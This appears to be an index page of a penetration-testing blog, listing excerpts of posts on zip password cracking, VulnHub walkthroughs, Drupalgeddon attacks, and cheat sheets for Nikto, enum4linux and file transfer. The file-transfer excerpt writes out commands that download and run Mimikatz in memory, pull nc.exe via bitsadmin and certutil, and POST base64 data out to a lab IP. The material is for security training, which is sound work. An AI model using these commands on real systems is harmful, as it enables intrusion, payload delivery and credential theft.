How to crack zip password on KALI linux

by

Views: 16Fcrackzip is a fast password cracker partly written in assembler. It is able to crack password protected zip files with brute force or dictionary based attacks, optionally testing with unzip its results. It can also crack cpmask’ed images. Install fcrackzip fcrackzip options Usage Example

VulnHub OS-bytesec: Walkthrough

by

Views: 54Enumeration Nmap scan Nikto scan SMB enumeration Users found, S-1-22-1-1000 Unix User\sagar (Local User)S-1-22-1-1001 Unix User\blackjax (Local User)S-1-22-1-1002 Unix User\smb (Local User) ‘smb’ account is configured without a password. Connect to the share as ‘smb’ and enumerate the share. Found a zip file named as ‘safe.zip’. Downloaded the file to local machine and found … Read more

Attacking Drupal

by

Views: 39Leveraging Known Vulnerabilities Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. At the time of writing, there are 3 Drupalgeddon vulnerabilities in existence. Drupalgeddon Manual exploitation As stated previously, this flaw can be exploited by leveraging a pre-authentication SQL injection which can be used to … Read more

Walkthrough – VulnHUB DC-1

by

Views: 16Enumeration Nmap scan Nmap scan reveals that the target is running a website based on Drupal CMS on port 80. Newer installs of Drupal by default block access to the CHANGELOG.txt and README.txt files, so we may need to do further enumeration. Although the target is running an older version of Drupal (7), these two files are not present … Read more

FILE TRANSFER – Cheat Sheet

by

Views: 11 Command Description  Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1 Download a file with PowerShell IEX (New-Object Net.WebClient).DownloadString(‘https://<snip>/Invoke-Mimikatz.ps1’) Execute a file in memory using PowerShell Invoke-WebRequest -Uri http://10.10.10.1:443 -Method POST -Body $b64 Upload a file with PowerShell bitsadmin /transfer n http://10.10.10.1/nc.exe C:\Temp\nc.exe Download a file using Bitsadmin certutil.exe -verifyctl -split -f http://10.10.10.1/nc.exe Download a file using Certutil … Read more

Nikto Cheat Sheet

by

Views: 25Nikto Cheat Sheet COMMAND DESCRIPTION nikto -h http://nlabs.local Scans the specified host nikto -h http://nlabs.local -Tuning 6 Uses a specific scan tuning level nikto -h http://nlabs.local -port 8080 Scans the specified port nikto -h http://nlabs.local -ssl Scans for SSL vulnerabilities nikto -h http://nlabs.local -Format html Formats output in HTML nikto -h http://nlabs.local -output out.txt … Read more

Enum4Linux Cheat sheet

by

Views: 54enum4linux Cheat Sheet COMMAND DESCRIPTION enum4linux -v target-ip Verbose mode, shows the underlying commands being executed by enum4linux enum4linux -a target-ip Do Everything, runs all options apart from dictionary based share name guessing enum4linux -U target-ip Lists usernames, if the server allows it – (RestrictAnonymous = 0) enum4linux -u administrator-p password -U target-ip If … Read more